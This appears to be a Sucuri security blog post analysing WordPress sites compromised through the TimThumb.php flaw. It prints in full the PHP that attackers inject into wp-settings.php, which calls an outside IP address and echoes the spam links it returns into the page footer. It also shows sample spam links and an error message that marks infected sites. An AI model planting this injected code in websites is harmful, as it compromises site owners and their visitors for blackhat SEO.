TimThumb.php Attacks – Now Being Used for Blackhat Spam SEO and Might Break Your Site

We have been talking a lot lately about the Timthumb.php vulnerability and the importance of updating that script as soon as possible. Sites that didn’t update it are getting compromised very easily. We explained it in more detail here: Mass infection of WordPress sites because of TimThumb.php.

What we are seeing now is sites getting compromised to load links for blackhat seo purposes. They have their wp-settings.php modified with the following code:

function google_bot() {$sUserAgent = strtolower($_SERVER[‘HTTP_USER_AGENT’]);if(!(strpos($sUserAgent, ‘google’) === false)) {if(isset($_SERVER[‘REMOTE_ADDR’]) == true && isset($_SERVER[‘HTTP_HOST’]) == true){$ch = curl_init("http://91.196.216.30/bot.php?ip=’.$_SERVER[‘REMOTE_ADDR"].’&host=’.$_SERVER[‘HTTP_HOST’].
‘&ua=’.urlencode($_SERVER[‘HTTP_USER_AGENT’]).’&ref=’.$_SERVER
[‘HTTP_REFERER’]);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 10);$re = curl_exec($ch);curl_close($ch);echo $re;}}}add_action(‘wp_footer’, "google_bot");

What this code does is very simple. It connects to http://91.196.216.30/bot.php to get a few links to be added to the bottom of your site. Links like:

 <a href="http://albertasportswear.com /wp-content/uploads/sweaters/sweater_tights&#46html" alt="Sweater 
Tights" title="Sweater Tights">Sweater Tights</a>
 dilbert sweater vest comic
<br>knitting softwares
 the knitting room fond du lac
 <a href="http://bettyoctopus.com /wp-content/uploads/knitting/knitting_instructions&#46html" alt="Knitting 
Instructions" title="Knitting Instructions">Knitting Instructions</a>
 knitting little luxuries louisa harding

It’s very dynamic, always changing. So in addition to having malware and infecting your users, you could be helping the attackers with page rank as well.

What is interesting is that on some sites the attackers are not only attempting to infect, but are doing it incorrectly leaving some extra lines at the bottom of the wp-settings.php, causing the sites to fail with this error:

Warning: Cannot modify header information – headers already sent by (output started at /home/site/public_html/wp-settings.php:310) in /home1/site/public_html/wp-includes/pluggable.php on line 890

So if you have this warning (headers already sent by (output started at /home/site/public_html/wp-settings.php:310) on your site, it means you are likely compromised as well.

You can check your site here to see if it has this issue: Sucuri SiteCheck

If you need help cleaning up up, sign up here: http://sucuri.net/signup

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.